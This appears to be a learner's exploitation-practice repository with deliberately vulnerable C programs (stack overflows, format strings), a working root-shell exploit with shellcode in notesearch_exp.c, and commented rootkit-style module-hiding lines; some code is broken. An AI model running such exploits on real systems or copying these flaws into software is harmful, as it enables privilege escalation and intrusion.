├── .gitignore ├── InsecureProgramming ├── Makefile ├── stack1.c ├── stack2.c ├── stack3.c ├── stack4.c ├── stack5.c └── stack6.c ├── Kernel ├── .gitignore ├── Makefile └── helloWorld.c ├── Makefile ├── README.md ├── SystemsProgramming ├── Wk1 │ ├── hw_bytes.c │ └── hw_write.c ├── Wk2 │ └── wk2.c ├── const_pointer.c └── q1_1.c ├── auth_ovflw.c ├── enc ├── enc.c ├── fmt_strings.c ├── fmt_vln.c ├── getenv.c └── notesearch_exp.c /.gitignore: -------------------------------------------------------------------------------- 1 | #Kernel 2 | *.out 3 | 4 | #Text 5 | *.txt 6 | 7 | # Object files 8 | *.o 9 | *.ko 10 | *.obj 11 | *.elf 12 | 13 | # Precompiled Headers 14 | *.gch 15 | *.pch 16 | 17 | # Libraries 18 | *.lib 19 | *.a 20 | *.la 21 | *.lo 22 | 23 | # Shared objects (inc. Windows DLLs) 24 | *.dll 25 | *.so 26 | *.so.* 27 | *.dylib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | *.i*86 34 | *.x86_64 35 | *.hex 36 | 37 | # Debug files 38 | *.dSYM/ 39 | -------------------------------------------------------------------------------- /InsecureProgramming/Makefile: -------------------------------------------------------------------------------- 1 | # *.out so as to be ignored by .gitignore 2 | CC = gcc 3 | CFLAGS = -fno-stack-protector 4 | DEBUG = -ggdb 5 | stack1: stack1.c 6 | $(CC) $(DEBUG) $(CFLAGS) -Wmultichar -o stack1.out stack1.c 7 | 8 | stack2: stack2.c 9 | $(CC) -ggdb $(CFLAGS)l -o stack2.out stack2.c 10 | 11 | stack3: stack3.c 12 | $(CC) -ggdb -fno-stack-protector -o stack3.out stack3.c 13 | 14 | stack4: stack4.c 15 | $(CC) -ggdb -fno-stack-protector -o stack4.out stack4.c 16 | 17 | stack5: stack5.c 18 | $(CC) -ggdb -fno-stack-protector -o stack5.out stack5.c 19 | 20 | stack6: stack6.c 21 | $(CC) $(DEBUG) $(CFLAGS) -o stack6.out stack6.c 22 | 23 | clean: 24 | rm *.out 25 | -------------------------------------------------------------------------------- /InsecureProgramming/stack1.c: -------------------------------------------------------------------------------- 1 | /* stack1-stdin.c * 2 | * specially crafted to feed your brain by gera */ 3 | 4 | #include 5 | 6 | int main() { 7 | int cookie; 8 | char buf[10]; 9 | 10 | printf("buf: %08x cookie: %08x\n", &buf, &cookie); 11 | gets(buf); 12 | 13 | printf("cookie: %x\n", *(&cookie)); 14 | 15 | if (cookie == 0x41424344) 16 | printf("you win!\n"); 17 | } 18 | -------------------------------------------------------------------------------- /InsecureProgramming/stack2.c: -------------------------------------------------------------------------------- 1 | /* stack2-stdin.c * 2 | * specially crafted to feed your brain by gera */ 3 | 4 | #include 5 | 6 | int main() { 7 | int cookie; 8 | char buf[12]; 9 | 10 | printf("buf: %08x cookie: %08x\n", &buf, &cookie); 11 | gets(buf); 12 | // DCBA == 0x41424344 13 | if (cookie == 0x41424344) 14 | printf("you win!\n"); 15 | } 16 | -------------------------------------------------------------------------------- /InsecureProgramming/stack3.c: -------------------------------------------------------------------------------- 1 | /* stack3-stdin.c * 2 | * specially crafted to feed your brain by gera */ 3 | 4 | #include 5 | void canNeverExecute(){ 6 | puts("Your LEET!!"); 7 | exit(0); 8 | } 9 | 10 | void print(char buf[], int cookie){ 11 | printf("buf: %08x cookie: %08x\n", &buf, &cookie); 12 | } 13 | 14 | int main(void) { 15 | int cookie; 16 | char buf[8]; 17 | print(buf[], &cookie); 18 | 19 | gets(buf); 20 | 21 | if (cookie == 0x01020005) 22 | printf("you win!\n"); 23 | } 24 | -------------------------------------------------------------------------------- /InsecureProgramming/stack4.c: -------------------------------------------------------------------------------- 1 | /* stack4-stdin.c * 2 | * specially crafted to feed your brain by gera */ 3 | 4 | #include 5 | 6 | int main() { 7 | int cookie; 8 | char buf[80]; 9 | 10 | printf("buf: %08x cookie: %08x\n", &buf, &cookie); 11 | gets(buf); 12 | 13 | if (cookie == 0x000d0a00) 14 | printf("you win!\n"); 15 | } 16 | -------------------------------------------------------------------------------- /InsecureProgramming/stack5.c: -------------------------------------------------------------------------------- 1 | /* stack5-stdin.c * 2 | * specially crafted to feed your brain by gera 3 | * python -c "print 'a'*1000 | ./stack6.out" 4 | */ 5 | 6 | #include 7 | void LEET(){ 8 | printf("YOu are now a leet program cracker\n"); 9 | } 10 | int main(int argc, char **argv) { 11 | 12 | char buf[64]; 13 | gets(buf); 14 | } 15 | -------------------------------------------------------------------------------- /InsecureProgramming/stack6.c: -------------------------------------------------------------------------------- 1 | #include 2 | /* (gdb) run perl -e 'print "A" x 268 . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' 3 | ./stack6.out ‘python -c "print 'a'*1000"’ 4 | 5 | */ 6 | 7 | int main(int argc, char * argv[]) { 8 | 9 | char buf[256]; 10 | puts("cli input"); 11 | puts("./stack6.out `python -c ""print 'a'*10""`"); 12 | 13 | if(argc == 1) { 14 | 15 | printf("Usage: %s \n", argv[0]); 16 | exit(0); 17 | 18 | } 19 | 20 | strcpy(buf,argv[1]); 21 | printf("%s\n", buf); 22 | 23 | } -------------------------------------------------------------------------------- /Kernel/.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o* 3 | *.ko* 4 | *.obj 5 | *.elf 6 | 7 | # Kernel 8 | *.tmp_versions/ 9 | *.mod* 10 | *.symvers 11 | 12 | # Precompiled Headers 13 | *.gch 14 | *.pch 15 | 16 | # Libraries 17 | *.lib 18 | *.a 19 | *.la 20 | *.lo 21 | 22 | # Shared objects (inc. Windows DLLs) 23 | *.dll 24 | *.so 25 | *.so.* 26 | *.dylib 27 | 28 | # Executables 29 | *.exe 30 | *.out 31 | *.app 32 | *.i*86 33 | *.x86_64 34 | *.hex 35 | 36 | # Debug files 37 | *.dSYM/ 38 | -------------------------------------------------------------------------------- /Kernel/Makefile: -------------------------------------------------------------------------------- 1 | obj-m := helloWorld.o 2 | KERNEL_DIR = /lib/modules/$(shell uname -r)/build 3 | PWD = $(shell pwd) 4 | all: 5 | $(MAKE) -C $(KERNEL_DIR) SUBDIRS=$(PWD) 6 | clean: 7 | rm -rf *.o *.symvers *.mod.* *.order 8 | -------------------------------------------------------------------------------- /Kernel/helloWorld.c: -------------------------------------------------------------------------------- 1 | /* 2 | /usr/src/linux-headers-2.6.32-21-generic/include/linux 3 | */ 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | MODULE_LICENSE("GPL"); 10 | 11 | #define START_CHECK 0XC0000000 12 | #define END_CHECK 0xD0000000 13 | 14 | 15 | typedef unsigned int psize; 16 | 17 | static int in_module(void){ 18 | /* Kernel Module hiding*/ 19 | // list_del_init(&__this_module.list); // hide from lsmod:/proc/modules 20 | // kobject_del(&THIS_MODULE->mkobj.kobj); //hide from /sys/module 21 | 22 | printk("Hacking: module loaded\n"); 23 | return 0; 24 | } 25 | 26 | static void out_module(void){ 27 | printk("Hacking: module removed\n"); 28 | } 29 | 30 | module_init(in_module); 31 | module_exit(out_module); -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | 3 | format: fmt_strings.c 4 | gcc -Wall -ggdb -o fmt_strings.out fmt_strings.c 5 | fmt: fmt_vln.c 6 | gcc -Wall -ggdb -o fmt_vln.out fmt_vln.c 7 | getenv: getenv.c 8 | gcc -Wall -o getenv.out getenv.c 9 | clean: 10 | rm *.out -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # C-Hacking 2 | Practice and learning in the world of C RE and exploit analysis 3 | -------------------------------------------------------------------------------- /SystemsProgramming/Wk1/hw_bytes.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | printf("Hello C data types. int min & max \n %d %d\n\n", INT_MIN, INT_MAX); 6 | printf("Char is a least 8bits\n"); 7 | printf("char is %d bITS\n", CHAR_BIT ); 8 | printf("sizeof(short) is %lu bytes\n", sizeof(short) ); 9 | printf("sizeof(long) is %lu bytes\n", sizeof(long) ); 10 | 11 | 12 | return 0; 13 | } -------------------------------------------------------------------------------- /SystemsProgramming/Wk1/hw_write.c: -------------------------------------------------------------------------------- 1 | /* Using syscall write to get output 2 | man write to see usage 3 | ssize_t write(int fd, const void *buf, size_t count); 4 | write- writes up to count bytes to fd where fd is stderr, stdout 5 | 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | //Are defined in unistd.h 14 | #define STDOUT_FILENO 1 15 | #define STDERR_FILENO 2 16 | 17 | int main(){ 18 | mode_t mode = S_IRUSR | S_IWUSR; 19 | //open is different then fopen 20 | int fd = open(".", O_CREAT | O_TRUNC | O_RDWR, mode); 21 | if (fd == -1) 22 | { 23 | perror("open failed"); 24 | exit(1); 25 | } 26 | 27 | printf("My fd is %d", fd ); //printf has a buffer. thats why it prints after unless \n 28 | write(STDOUT_FILENO, "this is an erorroror\n", 21); //without error checking 29 | if ( -1 == write(STDERR_FILENO, "t\n", 2 ) ) //with error checking 30 | puts("error with error"); 31 | write(fd, "great!\n", 7); 32 | close(fd); 33 | 34 | 35 | return 0; //in bash use 'echo $?' to print last programs exit code 36 | 37 | } -------------------------------------------------------------------------------- /SystemsProgramming/Wk2/wk2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | extern char ** environ; 5 | 6 | int main(){ 7 | char* s = getenv("USER"); 8 | printf("user is: %d\n", s ); 9 | const int consint; 10 | 11 | // consint = 32432; 12 | 13 | int data[5] = {10, 30, 60, 50, 40}; 14 | char string[] = "A B C 0123"; 15 | unsigned int temp; 16 | printf("data: %d\n", *(data + 1)); 17 | 18 | printf("Swapping\n"); 19 | 20 | temp = data[0]; 21 | data[0] = data[4]; 22 | data[4] = temp; 23 | for(size_t idx = 0; idx < 5; idx++){ 24 | printf("data[%zu] = %d\n", idx, *(data + idx) ); 25 | } 26 | 27 | 28 | return 0; 29 | } -------------------------------------------------------------------------------- /SystemsProgramming/const_pointer.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | /* 6 | * Working with const, const *, * const, const * const 7 | */ 8 | 9 | int main(){ 10 | 11 | const int const1 = 96; // const1 cannot be changed and is a constant integer value stored in.... 12 | unsigned int var, retValue; 13 | retValue = scanf("%d", &var); 14 | errno = 0; 15 | if (retValue == 0){ 16 | printf("No error\n"); 17 | } 18 | else 19 | perror("scanf"); 20 | 21 | printf("addr of const1 is:\t%p\n", &const1); 22 | printf("addr of var is: \t%p\n", &var); 23 | return 0; 24 | } -------------------------------------------------------------------------------- /SystemsProgramming/q1_1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | int a; // in BSS 4 | static int b; // in BSS, BSS is usually zeroed out 5 | 6 | int main(){ 7 | static int c; // are static variables zeroed? ____ 8 | char * ptrr = "Hello"; 9 | ptrr += 2; 10 | int *ptr; // holds a memory address ptr |____| 11 | *ptr = 0xAA; 12 | printf("addr of ptr is: %#x\n", &ptr ); 13 | printf("contents of ptr is: %#x\n", *ptr ); 14 | printf("ptr is: %#x\n", ptr ); 15 | // printf("%d %d %d %d\n",a,b,c,d ); 16 | return 0; 17 | } -------------------------------------------------------------------------------- /auth_ovflw.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int check_auth(char * password){ 6 | int auth_flag = 0; 7 | char password_buffer[16]; 8 | strcpy(password_buffer, password); 9 | 10 | if( 0 == strcmp(password_buffer, "brillig") ) 11 | auth_flag = 1; 12 | if( 0 == strcmp(password_buffer, "outgrabe") ) 13 | auth_flag = 1; 14 | 15 | return auth_flag; 16 | } 17 | 18 | int main(int argc, char* argv[]){ 19 | if(argc < 2){ 20 | printf("Usage: %s \n", argv[0]); 21 | exit(0); 22 | } 23 | if( check_auth(argv[1]) ){ 24 | printf("\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 25 | printf(" Access Granted.\n"); 26 | printf("\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 27 | } else{ 28 | printf("\nAccess Denied\n"); 29 | } 30 | } -------------------------------------------------------------------------------- /enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/211217613/C-Hacking/8eea8ca615a623ec5d148575103f5cc0ece17309/enc -------------------------------------------------------------------------------- /enc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | typedef uint8_t byte; 7 | 8 | void enc(char* plaintxt, byte key){ 9 | printf("key: %x\n", key); 10 | printf("plaintext is: %C\n", *plaintxt); 11 | while( *plaintxt ){ 12 | puts("Inside while"); 13 | printf("key: %x\n", key ); 14 | key = ( key * 5) + 7; 15 | *plaintxt = *plaintxt ^ key; 16 | printf("pt ^= key: %x\n", *plaintxt ); 17 | 18 | *(plaintxt++) += 9; 19 | printf("plaintxt++: %x\n", *plaintxt); 20 | } 21 | } 22 | 23 | int main (int argc, char * argv[]){ 24 | // char * message = {0x9b, 0x2a, 0x2b, 0xfc, 0x61, 0x2f, 0x0c, 0x66, 0x6b, 0x70, 0x20, 0x47, 0xd9, 0xcb, 0xc7, 0x65, 0x66}; 25 | char *plaintxt = "hhhheeeeelllllllllooooooooooo"; 26 | byte key = 0xAA; 27 | enc(plaintxt, key); 28 | return 0; 29 | } 30 | 31 | // Message: 9b 2a 2b fc 61 2f 0c 66 6b 70 20 47 d9 cb c7 65 66 32 | 33 | 34 | -------------------------------------------------------------------------------- /fmt_strings.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | char string[10]; 6 | int A = -73; 7 | int count_one, count_two; 8 | unsigned int B = 31337; 9 | 10 | strcpy(string, "sample"); 11 | 12 | printf("[A] Dec: %d, Hex: %x, unsigned: %u\n",A, A,A); 13 | printf("[B] Dec: %d, Hex: %x, unsigned: %u\n",B, B, B); 14 | printf("The number of bytes written up to this point X%n \ 15 | is being stored in count_one, and the number of bytes \ 16 | up to here X%n is being stored in count_two.\n", &count_one, &count_two); 17 | printf("count_one: %d\n", count_one ); 18 | printf("count_two: %d\n", count_two ); 19 | printf("A is %d and is at %#08x. B is %#08x. \n", A, &A ); 20 | return 0; 21 | } -------------------------------------------------------------------------------- /fmt_vln.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char *argv[]){ 5 | char text[1024] = {}; 6 | static int test_val = -72; 7 | 8 | if( 2 > argc ){ 9 | printf("Usage: %s \n", argv[0]); 10 | exit(0); 11 | } 12 | 13 | strcpy(text, argv[1]); 14 | 15 | printf("The right way to print user-controlled input:\n"); 16 | printf("%s\n", text ); 17 | 18 | printf("\nThe wrong way to print user-controlled input:\n"); 19 | printf(text); 20 | 21 | puts(""); 22 | printf("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"); 23 | 24 | //DEBUG 25 | printf("[*] test_val @ %#x = %d %#x\n", &test_val, test_val, test_val ); 26 | } -------------------------------------------------------------------------------- /getenv.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char **argv, char **env){ 4 | int index; 5 | for(index = 0; index < 100; index++){ 6 | printf("env[%d]: %s :: %#x\n",index, env[index], &env[index]); 7 | } 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /notesearch_exp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char shellcode[] = 6 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 7 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 8 | "\xe1\xcd\x80"; 9 | 10 | int main(int argc, char *argv[]){ 11 | unsigned int i, *ptr, ret, offset = 270; 12 | char *command, *buffer; 13 | 14 | command = (char*) malloc(200); 15 | bzero(command, 200); 16 | // memset(command, NULL, 200); 17 | strcpy(command, "./notesearch \' "); 18 | buffer = command + strlen(command); 19 | 20 | if (argc > 1 ) 21 | offset = atoi(argv[1]); 22 | 23 | ret = (unsigned int ) &i - offset; 24 | 25 | for(i = 0; i < 160; i+=4){ 26 | *((unsigned int*) (buffer + i)) = ret; 27 | } 28 | memset(buffer, 0x90, 60); //NOP slide 29 | memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1); 30 | strcat(command, "\'"); 31 | system(command); // run exploit 32 | 33 | free(command); 34 | return 0; 35 | } --------------------------------------------------------------------------------